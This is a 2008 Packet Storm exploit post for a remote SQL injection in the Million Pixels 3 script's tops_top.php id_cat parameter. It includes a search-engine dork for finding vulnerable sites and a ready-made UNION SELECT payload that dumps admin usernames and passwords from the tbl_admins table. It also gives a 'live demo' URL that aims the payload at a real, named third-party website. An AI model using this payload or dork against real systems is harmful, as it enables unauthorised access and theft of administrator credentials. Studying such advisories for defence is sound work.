millionpixels-sql.txt

2008-07-11T00:00:00
ID PACKETSTORM:68116
Type packetstorm
Reporter Hussin X
Modified 2008-07-11T00:00:00

Description

                                        
                                            `#################################################################  
#  
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability  
#  
#========================================================  
# =  
# Author: Hussin X =  
# =  
# Home : www.tryag.cc/cc  
# =  
# email: darkangel_g85[at]Yahoo[DoT]com =  
# =  
# =  
#========================================================  
#   
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php  
#  
# DorK : inurl: "tops_top.php? id_cat ="   
#################################################################  
  
Exploit:   
  
  
www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*  
  
  
  
  
L!VE DEMO:  
  
  
http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*  
  
  
  
  
########################( Greetz )###########################  
# #  
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #  
# #   
# Iraqihack / FAHD / mos_chori / Silic0n #  
# #  
#############################################################  
  
Im IRAQi  
`